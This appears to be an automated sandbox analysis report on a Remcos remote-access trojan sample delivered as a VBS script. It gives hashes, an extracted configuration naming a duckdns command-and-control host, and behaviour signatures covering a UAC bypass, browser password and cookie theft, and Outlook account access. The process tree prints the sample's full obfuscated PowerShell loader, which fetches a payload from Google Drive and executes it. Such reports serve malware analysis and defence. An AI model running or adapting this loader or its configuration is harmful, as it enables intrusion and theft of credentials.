remcos | 980d0b7857091bbaecb3cd4783a4d7ed19548cd63bf8f244e2b0ea7c10812c53

Analysis

max time kernel
148s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
12-11-2024 02:42

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

980d0b7857091bbaecb3cd4783a4d7ed19548cd63bf8f244e2b0ea7c10812c53.vbs
Size

86KB
MD5

b395f7c166e901cbb3d4560021b62f1e
SHA1

2ec42e99d3e040aa5dba198b6a258191a7abfd71
SHA256

980d0b7857091bbaecb3cd4783a4d7ed19548cd63bf8f244e2b0ea7c10812c53
SHA512

aa7de85f408873ddda3b27a7d716d7617cae31e5c18986815cc2bb496e7b716bbb9734c9dca4d1e1e7bf7539a7afac6e5f3af50b0174fb5dd4478e749a1fe581
SSDEEP

1536:G70tx9F0kevGd9pnpuoNfXuJsAvsxpuqkkZEfXTjSBVYt3gt1V9XaAj2/L/uqlG:GQH9FhQU9JMLkxHkfvTWBVYd8V98LmT

Score

10^/10

remcos remotehost collection credential_access discovery evasion rat stealer trojan

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

t-vw8qw3d.duckdns.org:23458

Attributes

audio_folder
MicRecords
audio_path
ApplicationPath
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
true
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-OFN57D
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Remcos family
remcos

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Detected Nirsoft tools 3 IoCs

Free utilities often used by attackers which can steal passwords, product keys, etc.

resource	yara_rule
behavioral2/memory/4796-90-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft
behavioral2/memory/5112-96-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft
behavioral2/memory/3148-88-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft

NirSoft MailPassView 1 IoCs

Password recovery tool for various email clients

resource	yara_rule
behavioral2/memory/4796-90-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView

NirSoft WebBrowserPassView 1 IoCs

Password recovery tool for various web browsers

resource	yara_rule
behavioral2/memory/3148-88-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView

Blocklisted process makes network request 13 IoCs

flow	pid	Process
4	2912	WScript.exe
8	1120	powershell.exe
13	1120	powershell.exe
25	1672	msiexec.exe
27	1672	msiexec.exe
29	1672	msiexec.exe
31	1672	msiexec.exe
32	1672	msiexec.exe
47	1672	msiexec.exe
49	1672	msiexec.exe
50	1672	msiexec.exe
51	1672	msiexec.exe
52	1672	msiexec.exe

Uses browser remote debugging 2 TTPs 9 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

credential_access stealer

Steal Web Session Cookie

T1539

Modify Authentication Process

T1556

pid	Process
3076	Chrome.exe
4700	msedge.exe
3380	msedge.exe
1860	Chrome.exe
1060	Chrome.exe
4864	Chrome.exe
4316	msedge.exe
1820	msedge.exe
2208	msedge.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation	WScript.exe

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	msiexec.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
7	drive.google.com
8	drive.google.com
25	drive.google.com

Network Service Discovery 1 TTPs 2 IoCs

Attempt to gather information on host's network.

discovery

Network Service Discovery

T1046

pid	Process
1120	powershell.exe
4508	powershell.exe

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
1672	msiexec.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
4508	powershell.exe
1672	msiexec.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 1672 set thread context of 3148	1672	msiexec.exe	106
PID 1672 set thread context of 4796	1672	msiexec.exe	107
PID 1672 set thread context of 5112	1672	msiexec.exe	108

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	Chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
876	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1120	powershell.exe
1120	powershell.exe
4508	powershell.exe
4508	powershell.exe
4508	powershell.exe
1672	msiexec.exe
1672	msiexec.exe
1672	msiexec.exe
1672	msiexec.exe
1672	msiexec.exe
1672	msiexec.exe
1672	msiexec.exe
1672	msiexec.exe
1672	msiexec.exe
1672	msiexec.exe
1672	msiexec.exe
1672	msiexec.exe
1672	msiexec.exe
1672	msiexec.exe
3148	msiexec.exe
3148	msiexec.exe
1672	msiexec.exe
1672	msiexec.exe
1672	msiexec.exe
1672	msiexec.exe
5112	msiexec.exe
5112	msiexec.exe
5112	msiexec.exe
1672	msiexec.exe
1672	msiexec.exe
1672	msiexec.exe
1672	msiexec.exe
1672	msiexec.exe
1672	msiexec.exe
1672	msiexec.exe
1672	msiexec.exe
1672	msiexec.exe
1672	msiexec.exe
3148	msiexec.exe
3148	msiexec.exe
1860	Chrome.exe
1860	Chrome.exe
1672	msiexec.exe
1672	msiexec.exe
1672	msiexec.exe
1672	msiexec.exe
1672	msiexec.exe
1672	msiexec.exe
1672	msiexec.exe
1672	msiexec.exe
1672	msiexec.exe
1672	msiexec.exe
1672	msiexec.exe
1672	msiexec.exe
1672	msiexec.exe
1672	msiexec.exe
1672	msiexec.exe
1672	msiexec.exe
1672	msiexec.exe
1672	msiexec.exe
1672	msiexec.exe
1672	msiexec.exe
1672	msiexec.exe
1672	msiexec.exe

Suspicious behavior: MapViewOfSection 5 IoCs

pid	Process
4508	powershell.exe
1672	msiexec.exe
1672	msiexec.exe
1672	msiexec.exe
1672	msiexec.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs

pid	Process
4700	msedge.exe
4700	msedge.exe
4700	msedge.exe
4700	msedge.exe

Suspicious use of AdjustPrivilegeToken 19 IoCs

description	pid	Process
Token: SeDebugPrivilege	1120	powershell.exe
Token: SeDebugPrivilege	4508	powershell.exe
Token: SeDebugPrivilege	5112	msiexec.exe
Token: SeShutdownPrivilege	1860	Chrome.exe
Token: SeCreatePagefilePrivilege	1860	Chrome.exe
Token: SeShutdownPrivilege	1860	Chrome.exe
Token: SeCreatePagefilePrivilege	1860	Chrome.exe
Token: SeShutdownPrivilege	1860	Chrome.exe
Token: SeCreatePagefilePrivilege	1860	Chrome.exe
Token: SeShutdownPrivilege	1860	Chrome.exe
Token: SeCreatePagefilePrivilege	1860	Chrome.exe
Token: SeShutdownPrivilege	1860	Chrome.exe
Token: SeCreatePagefilePrivilege	1860	Chrome.exe
Token: SeShutdownPrivilege	1860	Chrome.exe
Token: SeCreatePagefilePrivilege	1860	Chrome.exe
Token: SeShutdownPrivilege	1860	Chrome.exe
Token: SeCreatePagefilePrivilege	1860	Chrome.exe
Token: SeShutdownPrivilege	1860	Chrome.exe
Token: SeCreatePagefilePrivilege	1860	Chrome.exe

Suspicious use of FindShellTrayWindow 3 IoCs

pid	Process
1860	Chrome.exe
4700	msedge.exe
4700	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2912 wrote to memory of 1120	2912	WScript.exe	84
PID 2912 wrote to memory of 1120	2912	WScript.exe	84
PID 4508 wrote to memory of 1672	4508	powershell.exe	97
PID 4508 wrote to memory of 1672	4508	powershell.exe	97
PID 4508 wrote to memory of 1672	4508	powershell.exe	97
PID 4508 wrote to memory of 1672	4508	powershell.exe	97
PID 1672 wrote to memory of 1488	1672	msiexec.exe	99
PID 1672 wrote to memory of 1488	1672	msiexec.exe	99
PID 1672 wrote to memory of 1488	1672	msiexec.exe	99
PID 1488 wrote to memory of 876	1488	cmd.exe	101
PID 1488 wrote to memory of 876	1488	cmd.exe	101
PID 1488 wrote to memory of 876	1488	cmd.exe	101
PID 1672 wrote to memory of 1860	1672	msiexec.exe	103
PID 1672 wrote to memory of 1860	1672	msiexec.exe	103
PID 1860 wrote to memory of 4452	1860	Chrome.exe	104
PID 1860 wrote to memory of 4452	1860	Chrome.exe	104
PID 1672 wrote to memory of 2676	1672	msiexec.exe	105
PID 1672 wrote to memory of 2676	1672	msiexec.exe	105
PID 1672 wrote to memory of 2676	1672	msiexec.exe	105
PID 1672 wrote to memory of 3148	1672	msiexec.exe	106
PID 1672 wrote to memory of 3148	1672	msiexec.exe	106
PID 1672 wrote to memory of 3148	1672	msiexec.exe	106
PID 1672 wrote to memory of 3148	1672	msiexec.exe	106
PID 1672 wrote to memory of 4796	1672	msiexec.exe	107
PID 1672 wrote to memory of 4796	1672	msiexec.exe	107
PID 1672 wrote to memory of 4796	1672	msiexec.exe	107
PID 1672 wrote to memory of 4796	1672	msiexec.exe	107
PID 1672 wrote to memory of 5112	1672	msiexec.exe	108
PID 1672 wrote to memory of 5112	1672	msiexec.exe	108
PID 1672 wrote to memory of 5112	1672	msiexec.exe	108
PID 1672 wrote to memory of 5112	1672	msiexec.exe	108
PID 1860 wrote to memory of 3808	1860	Chrome.exe	109
PID 1860 wrote to memory of 3808	1860	Chrome.exe	109
PID 1860 wrote to memory of 3808	1860	Chrome.exe	109
PID 1860 wrote to memory of 3808	1860	Chrome.exe	109
PID 1860 wrote to memory of 3808	1860	Chrome.exe	109
PID 1860 wrote to memory of 3808	1860	Chrome.exe	109
PID 1860 wrote to memory of 3808	1860	Chrome.exe	109
PID 1860 wrote to memory of 3808	1860	Chrome.exe	109
PID 1860 wrote to memory of 3808	1860	Chrome.exe	109
PID 1860 wrote to memory of 3808	1860	Chrome.exe	109
PID 1860 wrote to memory of 3808	1860	Chrome.exe	109
PID 1860 wrote to memory of 3808	1860	Chrome.exe	109
PID 1860 wrote to memory of 3808	1860	Chrome.exe	109
PID 1860 wrote to memory of 3808	1860	Chrome.exe	109
PID 1860 wrote to memory of 3808	1860	Chrome.exe	109
PID 1860 wrote to memory of 3808	1860	Chrome.exe	109
PID 1860 wrote to memory of 3808	1860	Chrome.exe	109
PID 1860 wrote to memory of 3808	1860	Chrome.exe	109
PID 1860 wrote to memory of 3808	1860	Chrome.exe	109
PID 1860 wrote to memory of 3808	1860	Chrome.exe	109
PID 1860 wrote to memory of 3808	1860	Chrome.exe	109
PID 1860 wrote to memory of 3808	1860	Chrome.exe	109
PID 1860 wrote to memory of 3808	1860	Chrome.exe	109
PID 1860 wrote to memory of 3808	1860	Chrome.exe	109
PID 1860 wrote to memory of 3808	1860	Chrome.exe	109
PID 1860 wrote to memory of 3808	1860	Chrome.exe	109
PID 1860 wrote to memory of 3808	1860	Chrome.exe	109
PID 1860 wrote to memory of 3808	1860	Chrome.exe	109
PID 1860 wrote to memory of 3808	1860	Chrome.exe	109
PID 1860 wrote to memory of 3808	1860	Chrome.exe	109
PID 1860 wrote to memory of 5004	1860	Chrome.exe	110
PID 1860 wrote to memory of 5004	1860	Chrome.exe	110
PID 1860 wrote to memory of 1008	1860	Chrome.exe	111

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\980d0b7857091bbaecb3cd4783a4d7ed19548cd63bf8f244e2b0ea7c10812c53.vbs"
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2912
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Tilsvarene Harpiksen Fenetre Capillarities Water Soklets #><#Skafferen Drikkevandsforsyningernes Prepatrician felonious Skiferdkkere #>$Antiperthite118='Irreconcilement';function Autobiografierne($adoniram){If ($host.DebuggerEnabled) {$Tnkest++;$Oprejsning=$adoniram.'Length' - $Tnkest} for ( $Maeglingsmaend=4;$Maeglingsmaend -lt $Oprejsning;$Maeglingsmaend+=5){$Skulderstrops=$Maeglingsmaend;$Konfidensintervals136+=$adoniram[$Maeglingsmaend]}$Konfidensintervals136}function Neurological($vigepligtige){ .($Jacked) ($vigepligtige)}$Javanese=Autobiografierne 'fie nRetseVagtt Und. RagWSprnEHaerbCyprcCop lMelliVansE ugnUnsuTb.ge ';$Sprogkundskabers=Autobiografierne 'SupeMInduo TrezBouri oerl heflBetaaS,ag/Wast ';$Lovliggrende=Autobiografierne ' PatT SynlFlods,nch1T,re2Bnhr ';$Maeglingsmaendskremen='were[ errNFllee LevT K s.KursS borE nbrRTermVB okIDes.cScrye Lamp BldOForgI Pron WortSortMGonfaNiniNU,inaStilGSepteLeveROver]Kl.b:Hjsp:Bu iSStudE NymC Flau emar BygI HypTRaseyBrn P ugbR S,noBehoTMorgoCyclcBereODecelBema=Tele$IntelNummOcoriVSkriL EncI loGAgadG,yltrBi,oE FirnVerddBldgeArgu ';$Sprogkundskabers+=Autobiografierne 'Prol5Henf.Mela0 Mag Nett(P,ctWSl,biGigmnLilldKlaroTwelwDobbs ole Ove NUdraTS an T.ek1Trod0H ve.Aars0Play;Furp BifuW I bi,amen Pim6Myri4Lane; yr Chisxre,f6Sulf4Fl p;Wr n Amnr SpivP.ng:Dyrk1,ong3Labo1,tee. Afs0Tamd)Slid AutGVrdieH stcT.ykk FoooStje/Forg2 Pic0 aed1Bilh0S ro0O.yc1Preg0 avn1 xyl Zen FEx.si RemrKroneIneffAvouoMortx Cun/ Bi 1Prin3Oste1Strk. Be 0 P r ';$Alluringly=Autobiografierne 'NarwU,nraS UnsEPararD zz-PoppaMyatgStefEPre NMi,rTGo s ';$Spartelmassers=Autobiografierne 'KnhjhLyngt BantNse pBurssSkib:Sand/Besi/enjodMedirBabyiculmvSmgte Gre.votugPresoM droGrnsgyndll diae Com.FabrcKrseoIntem P r/ .nsuPentcMi i?B tteB anxRibbp,agtoStenrUn,itring=Lbekd nrooD ffwt omnStanlIn ooIm eaSoordChow&IbrniGeyad epi=Femt1 F uhKlapPmusejB tiSSkrixPu fZBildvArkihSavlLTbruB RdhQ hriFUnakOH thuPuttC Hi XGdniyB ggRC.mpSVi,aQ Exci PreYKrea0He.trUdsk- BuhcTzar1Hung2UncoGUndeQausf_Eng,4inds ';$Cohostess=Autobiografierne '.ane>S,bs ';$Jacked=Autobiografierne 'PelyIAsareMa.nXDeta ';$Credit='Usketes';$Surfboats='\Vexable.baa';Neurological (Autobiografierne 'Skam$Bumpg lknl panoVur bFljdAt beLFl.g:remic Br ISideTAnt AKhand etoeDitmlPlumlStjeE TarTbeses Lev=wago$ forEHaannUdleV le:SaniABeveP Rfupgladdteksa CretHemiaSemi+Spro$TraaSfletUIndtrseasFBankb StuoPlataBranTUnadSSkaa ');Neurological (Autobiografierne 'B.aa$tap GIndklDo,ioSkovbPassAPlaylLyri:Ska MBestIBedasInddsSulfIFleeF TraiNamecPalaaFormTDesieUdg,=de e$Pre,S kolP ingAEtnoR PatTopgaE curlFolkMSuprAU,leSSkr,s choE iggrlgessPiol. repsLokapNonaLAfmaiDuroT xcu(Sols$KoloCColaOKl gH S tO IncsInadtKv tEApp,spr,gsWras)Ende ');Neurological (Autobiografierne $Maeglingsmaendskremen);$Spartelmassers=$Missificate[0];$Svalingens=(Autobiografierne 'Inds$ SupGD,bil os ose.tBhrevAForeLadel:UndeaMicrN EpinShasoProjN kruC Ha eKa tRE spiImponAu oGPreeeGr nrBetaN ,veE Mess Be,= ntonRes EconcwKume-P,raoPretb endJreveEModrCStiptAlar ,rguSSu by ,ilsNonmt ineForcMHenr.Elge$SchojS,orA raiVStr AHallnFevee MisSY.utETyk, ');Neurological ($Svalingens);Neurological (Autobiografierne 'St o$ ermAhermn No.n PeroPlatnO hjcPl se UgerGasri Pegn ontg SeaeR verAmain ,ene Spisre o.As iH ecteFeuia racdparie,loprCineslibe[st k$ OpkA SkrlDeutlBo,gu JourSlaui AfvnOceagTornlCtrkyStap] emi=Cont$KnetS,osspDekorDa aoB.efgH,nekFrisu BacncuridudtvsIndbkdepoaL,meb rteeKlonr niqsSe,i ');$Preston=Autobiografierne ' Ove$SumpAPlsenPerinHi,do G,nn FoucExc eNarrr oniSygenLdregMinie terrUnpen ileRummsCoge.Li eDSl goSkydw.trgn VollUniporefiaMa,sdKogsFIndai TurlFlete ine( For$T.ilSSkampDagsaPtyar mautEquieWheelForumPeniablans yvtsspire norr Wh sUlyk,Voca$Ungdr H aaSa lcTo deBallmEre oPhotsMy teDiag)Gaze ';$racemose=$Citadellets;Neurological (Autobiografierne 'Rh.m$AlkygRevilViadoSkonBUndea Till Bef:Overa ScaD.gurRIrraEFanesUdsaSAft,eSun fFiltESympLOp.eT,ingE ContChi =Gt p(,ilit AlaE,trysMuint orc-.apapAcetAMat,T napHskrm ,nco$UhjlrPhagA,nuscRetoESupeMtrakoPreiS Ma e Pre)Mu.k ');while (!$Adressefeltet) {Neurological (Autobiografierne 'Silu$UdvigLyd,lops.oHemabAuroaPe.tlNrhe:TrdnBSortoNearr StjaTil,zF ldou prnA ti=Udl $RefltOrthr .neuUni eVand ') ;Neurological $Preston;Neurological (Autobiografierne ' ormsOve.tForsA,tarrFy rtsulf-StedS IndLDisbeAno eHj,np .ob Dds4Dast ');Neurological (Autobiografierne 'thes$b ingO iylPresOVaflBbomna IndL U e:Bal a artdIncir Dobegeors Ba.sOneheTerkfOpgae StiLBelotPlagEHypeT em=Conc(JoaktRearEUnwiS napTExcr- AutpPlumA D.lTRetihRang Tabe$Teper,erlA TroCUnraEKnudmRonaoBirrs SpiENonv)Thor ') ;Neurological (Autobiografierne ' .ap$SislGNon.lCe cOgoosbNummaFun lSk d: Wi L SamUSkagS icrtBa cfIngeU BioLLrelN BruEDejesVandS Rem=S,ut$ kunGVinlLSownOSn eBHrdea enLMast:UdveuSirenEu oS mbrtNondOBe krR,ine Udg+Absu+T lw%de n$KulemOverIW.eksAkt,sI.dlI g mFFremi BouCWak aBlodTStaneAe,l.KursCUnbrOFremuPalmnC,nsT,kri ') ;$Spartelmassers=$Missificate[$Lustfulness]}$Deports=297429;$Lingonberry=31128;Neurological (Autobiografierne 'Anli$Aph G alilAgr.OVal,b AgpAGr nLStea:Rev,FKla LFritiensvkBeliK Rege Kenn Urosme,g Af,r= Byz OpryG ConE tatT Jou-EtabC.etaO FadNAfmat jereNutgN usktcitr L v$HaarrFldeAPicnC GirEnarkmHurkoReses,lseE U s ');Neurological (Autobiografierne 'Cyk $ nifgHipplRounoO.erbV lbaV.tfl Che:UdspSUnfitStili emakB ankD eseUndelRingsDunkbRaerrSignd ZonrChorbProdeTapirAllunSerfeSout Fdre=umen Sk,s[El tSskopyToldsS dvtNgleeBrigmA ti.Etw CndhjoParanFar,vGruneNonsrAk stSpis]Ci a:Dri.:handFProlr Fr.oFilmm uaBPrpaaSkras SyseCa,a6 D.e4Un,oSSkattPlatrWhydiTilsn FlogSp,i(appr$ traFTyndlRetriS nhkProfk flae,uffn indsC ki)U ig ');Neurological (Autobiografierne 'Lavo$Fl,egboddLVaniOHygrbDiagA .ogLSubr:MadrHTilhVCrp IA prDArt.mI.trAInt lUd aEQuarD AfgEstakSList .ea=,sth Kreu[KorpSSkytYdisusUddaTProleBiplM Tmm.HkerTVinteShotxZy nT,yrl. kuleTe tN,awnC incORappDIkenIMossnVacug ty] Res: Tin:PersAUrh.SVrdiCOveriBoksi Ren. Re gSkaleadreT LitsCodetDisprMissI onNv.neGFgte( tif$RentSShacT aceiCre kIncaK HavEFattLDu tS rthBSublrDip DFasaR Julbtel e.verr ,ianSn rETh.s)B,pr ');Neurological (Autobiografierne 'Kkk.$Ri eg ifiLPrveOFo.nBU.soa oedLBesu:FiloF SkoOInsuNTiltD ioSImprBFragEInteSKlastDoggY ndiRPa lEUdvul KofsCorpEBlacRTilssVekt=Retw$FrdehSukkvTaddiPremDSnusMNarka Favl RumEInduDA fleLavtS Hit.Pro SFaciUbasebSnevsAntit,ondRbilpIMellnmedfGDra ( Kap$latrD KapEPappPA,erO badrT gitUd,vsDiso, Goo$ PellEloxiStr,n kgGGrayo C,uNElevBDekaeZebrRFeusRRichysans)Ska ');Neurological $Fondsbestyrelsers;"
  2⤵
  - Blocklisted process makes network request
  - Network Service Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1120

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Tilsvarene Harpiksen Fenetre Capillarities Water Soklets #><#Skafferen Drikkevandsforsyningernes Prepatrician felonious Skiferdkkere #>$Antiperthite118='Irreconcilement';function Autobiografierne($adoniram){If ($host.DebuggerEnabled) {$Tnkest++;$Oprejsning=$adoniram.'Length' - $Tnkest} for ( $Maeglingsmaend=4;$Maeglingsmaend -lt $Oprejsning;$Maeglingsmaend+=5){$Skulderstrops=$Maeglingsmaend;$Konfidensintervals136+=$adoniram[$Maeglingsmaend]}$Konfidensintervals136}function Neurological($vigepligtige){ .($Jacked) ($vigepligtige)}$Javanese=Autobiografierne 'fie nRetseVagtt Und. RagWSprnEHaerbCyprcCop lMelliVansE ugnUnsuTb.ge ';$Sprogkundskabers=Autobiografierne 'SupeMInduo TrezBouri oerl heflBetaaS,ag/Wast ';$Lovliggrende=Autobiografierne ' PatT SynlFlods,nch1T,re2Bnhr ';$Maeglingsmaendskremen='were[ errNFllee LevT K s.KursS borE nbrRTermVB okIDes.cScrye Lamp BldOForgI Pron WortSortMGonfaNiniNU,inaStilGSepteLeveROver]Kl.b:Hjsp:Bu iSStudE NymC Flau emar BygI HypTRaseyBrn P ugbR S,noBehoTMorgoCyclcBereODecelBema=Tele$IntelNummOcoriVSkriL EncI loGAgadG,yltrBi,oE FirnVerddBldgeArgu ';$Sprogkundskabers+=Autobiografierne 'Prol5Henf.Mela0 Mag Nett(P,ctWSl,biGigmnLilldKlaroTwelwDobbs ole Ove NUdraTS an T.ek1Trod0H ve.Aars0Play;Furp BifuW I bi,amen Pim6Myri4Lane; yr Chisxre,f6Sulf4Fl p;Wr n Amnr SpivP.ng:Dyrk1,ong3Labo1,tee. Afs0Tamd)Slid AutGVrdieH stcT.ykk FoooStje/Forg2 Pic0 aed1Bilh0S ro0O.yc1Preg0 avn1 xyl Zen FEx.si RemrKroneIneffAvouoMortx Cun/ Bi 1Prin3Oste1Strk. Be 0 P r ';$Alluringly=Autobiografierne 'NarwU,nraS UnsEPararD zz-PoppaMyatgStefEPre NMi,rTGo s ';$Spartelmassers=Autobiografierne 'KnhjhLyngt BantNse pBurssSkib:Sand/Besi/enjodMedirBabyiculmvSmgte Gre.votugPresoM droGrnsgyndll diae Com.FabrcKrseoIntem P r/ .nsuPentcMi i?B tteB anxRibbp,agtoStenrUn,itring=Lbekd nrooD ffwt omnStanlIn ooIm eaSoordChow&IbrniGeyad epi=Femt1 F uhKlapPmusejB tiSSkrixPu fZBildvArkihSavlLTbruB RdhQ hriFUnakOH thuPuttC Hi XGdniyB ggRC.mpSVi,aQ Exci PreYKrea0He.trUdsk- BuhcTzar1Hung2UncoGUndeQausf_Eng,4inds ';$Cohostess=Autobiografierne '.ane>S,bs ';$Jacked=Autobiografierne 'PelyIAsareMa.nXDeta ';$Credit='Usketes';$Surfboats='\Vexable.baa';Neurological (Autobiografierne 'Skam$Bumpg lknl panoVur bFljdAt beLFl.g:remic Br ISideTAnt AKhand etoeDitmlPlumlStjeE TarTbeses Lev=wago$ forEHaannUdleV le:SaniABeveP Rfupgladdteksa CretHemiaSemi+Spro$TraaSfletUIndtrseasFBankb StuoPlataBranTUnadSSkaa ');Neurological (Autobiografierne 'B.aa$tap GIndklDo,ioSkovbPassAPlaylLyri:Ska MBestIBedasInddsSulfIFleeF TraiNamecPalaaFormTDesieUdg,=de e$Pre,S kolP ingAEtnoR PatTopgaE curlFolkMSuprAU,leSSkr,s choE iggrlgessPiol. repsLokapNonaLAfmaiDuroT xcu(Sols$KoloCColaOKl gH S tO IncsInadtKv tEApp,spr,gsWras)Ende ');Neurological (Autobiografierne $Maeglingsmaendskremen);$Spartelmassers=$Missificate[0];$Svalingens=(Autobiografierne 'Inds$ SupGD,bil os ose.tBhrevAForeLadel:UndeaMicrN EpinShasoProjN kruC Ha eKa tRE spiImponAu oGPreeeGr nrBetaN ,veE Mess Be,= ntonRes EconcwKume-P,raoPretb endJreveEModrCStiptAlar ,rguSSu by ,ilsNonmt ineForcMHenr.Elge$SchojS,orA raiVStr AHallnFevee MisSY.utETyk, ');Neurological ($Svalingens);Neurological (Autobiografierne 'St o$ ermAhermn No.n PeroPlatnO hjcPl se UgerGasri Pegn ontg SeaeR verAmain ,ene Spisre o.As iH ecteFeuia racdparie,loprCineslibe[st k$ OpkA SkrlDeutlBo,gu JourSlaui AfvnOceagTornlCtrkyStap] emi=Cont$KnetS,osspDekorDa aoB.efgH,nekFrisu BacncuridudtvsIndbkdepoaL,meb rteeKlonr niqsSe,i ');$Preston=Autobiografierne ' Ove$SumpAPlsenPerinHi,do G,nn FoucExc eNarrr oniSygenLdregMinie terrUnpen ileRummsCoge.Li eDSl goSkydw.trgn VollUniporefiaMa,sdKogsFIndai TurlFlete ine( For$T.ilSSkampDagsaPtyar mautEquieWheelForumPeniablans yvtsspire norr Wh sUlyk,Voca$Ungdr H aaSa lcTo deBallmEre oPhotsMy teDiag)Gaze ';$racemose=$Citadellets;Neurological (Autobiografierne 'Rh.m$AlkygRevilViadoSkonBUndea Till Bef:Overa ScaD.gurRIrraEFanesUdsaSAft,eSun fFiltESympLOp.eT,ingE ContChi =Gt p(,ilit AlaE,trysMuint orc-.apapAcetAMat,T napHskrm ,nco$UhjlrPhagA,nuscRetoESupeMtrakoPreiS Ma e Pre)Mu.k ');while (!$Adressefeltet) {Neurological (Autobiografierne 'Silu$UdvigLyd,lops.oHemabAuroaPe.tlNrhe:TrdnBSortoNearr StjaTil,zF ldou prnA ti=Udl $RefltOrthr .neuUni eVand ') ;Neurological $Preston;Neurological (Autobiografierne ' ormsOve.tForsA,tarrFy rtsulf-StedS IndLDisbeAno eHj,np .ob Dds4Dast ');Neurological (Autobiografierne 'thes$b ingO iylPresOVaflBbomna IndL U e:Bal a artdIncir Dobegeors Ba.sOneheTerkfOpgae StiLBelotPlagEHypeT em=Conc(JoaktRearEUnwiS napTExcr- AutpPlumA D.lTRetihRang Tabe$Teper,erlA TroCUnraEKnudmRonaoBirrs SpiENonv)Thor ') ;Neurological (Autobiografierne ' .ap$SislGNon.lCe cOgoosbNummaFun lSk d: Wi L SamUSkagS icrtBa cfIngeU BioLLrelN BruEDejesVandS Rem=S,ut$ kunGVinlLSownOSn eBHrdea enLMast:UdveuSirenEu oS mbrtNondOBe krR,ine Udg+Absu+T lw%de n$KulemOverIW.eksAkt,sI.dlI g mFFremi BouCWak aBlodTStaneAe,l.KursCUnbrOFremuPalmnC,nsT,kri ') 